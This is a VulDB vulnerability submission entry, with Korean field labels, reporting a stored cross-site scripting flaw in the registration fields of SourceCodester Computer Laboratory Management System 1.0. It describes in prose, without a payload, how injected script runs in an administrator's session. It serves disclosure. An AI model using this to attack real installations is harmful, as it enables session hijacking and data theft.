| 제목 | sourcecodester Computer Laboratory Management System 1.0 stord xss |
|---|
| 설명 | The provided code contains a Cross-Site Scripting (XSS) vulnerability due to inadequate validation and sanitization of user input. Specifically, the registration() method within the Users class lacks proper filtering of user-supplied data before incorporating it into SQL queries. This flaw enables an attacker to inject malicious scripts, such as JavaScript code, into the application. Exploiting this vulnerability allows attackers to execute arbitrary code within the context of an administrator's session. An attacker can craft a payload containing a malicious script and submit it through user input fields like firstname, middlename, lastname, or username. Upon viewing the user list, the injected script executes, leading to XSS attacks. This vulnerability poses significant risks, including data theft, session hijacking, and application defacement. |
|---|
| 원천 | ⚠️ https://github.com/Sospiro014/zday1/blob/main/xss_1.md |
|---|
| 사용자 | SoSPiro (UID 67134) |
|---|
| 제출 | 2024. 04. 01. PM 12:52 (2 연령 ago) |
|---|
| 모더레이션 | 2024. 04. 01. PM 07:42 (7 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 258915 [SourceCodester Computer Laboratory Management System 1.0 Users.php?f=save middlename 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 20 |
|---|